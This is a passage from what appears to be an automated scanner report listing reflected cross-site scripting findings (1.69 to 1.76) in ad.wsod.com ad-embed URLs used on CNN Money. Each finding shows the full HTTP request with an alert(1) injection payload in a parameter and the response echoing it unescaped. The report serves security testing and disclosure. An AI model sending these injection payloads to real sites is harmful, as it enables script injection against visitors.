Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
pt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909458**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click9d7ff"-alert(1)-"682d290d23b&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703
...[SNIP]...

1.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 152b6"><script>alert(1)</script>0c1b3a46233 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click152b6"><script>alert(1)</script>0c1b3a46233&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2851

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click152b6"><script>alert(1)</script>0c1b3a46233&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703
...[SNIP]...

1.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d09d"-alert(1)-"2fada7ea045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=&7d09d"-alert(1)-"2fada7ea045=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2827

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
3852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=&7d09d"-alert(1)-"2fada7ea045=1">
...[SNIP]...

1.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92b34"><script>alert(1)</script>0a6691a4519 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=&92b34"><script>alert(1)</script>0a6691a4519=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2857

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
3852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=&92b34"><script>alert(1)</script>0a6691a4519=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef1c1'-alert(1)-'15cd63af330 was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=clickef1c1'-alert(1)-'15cd63af330&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:42:13 GMT; path=/
Set-Cookie: i_1=25:1538:134:113:0:42421:1300909333:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:42:13 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 838

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=clickef1c1'-alert(1)-'15cd63af330&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,4
...[SNIP]...

1.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [AdID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60b5f'-alert(1)-'19e5a4bf28e was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=48323960b5f'-alert(1)-'19e5a4bf28e&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:42:55 GMT; path=/
Set-Cookie: i_1=25:1538:693:113:0:42421:1300909375:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:42:55 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 842

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=48323960b5f'-alert(1)-'19e5a4bf28e&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485
...[SNIP]...

1.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [FlightID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d136c'-alert(1)-'a86864c90b7 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443d136c'-alert(1)-'a86864c90b7&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:42:27 GMT; path=/
Set-Cookie: i_1=25:1538:134:113:0:42421:1300909347:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:42:27 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 838

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443d136c'-alert(1)-'a86864c90b7&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163
...[SNIP]...

1.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [Redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68b11'-alert(1)-'3ef9baa7320 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=68b11'-alert(1)-'3ef9baa7320 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:44:34 GMT; path=/
Set-Cookie: i_1=25:1538:693:113:0:42421:1300909474:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:44:34 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 842

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=68b11'-alert(1)-'3ef9baa7320http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.693.iframe.306x25/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out more!">
...[SNIP]...

1.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [Segments parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7201'-alert(1)-'8f879f37d5f was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805c7201'-alert(1)-'8f879f37d5f&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:43:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:43:46 GMT; path=/
Set-Cookie: i_1=25:1538:822:113:0:42421:1300909426:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:43:46 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 847

   function wsod_image1538() {
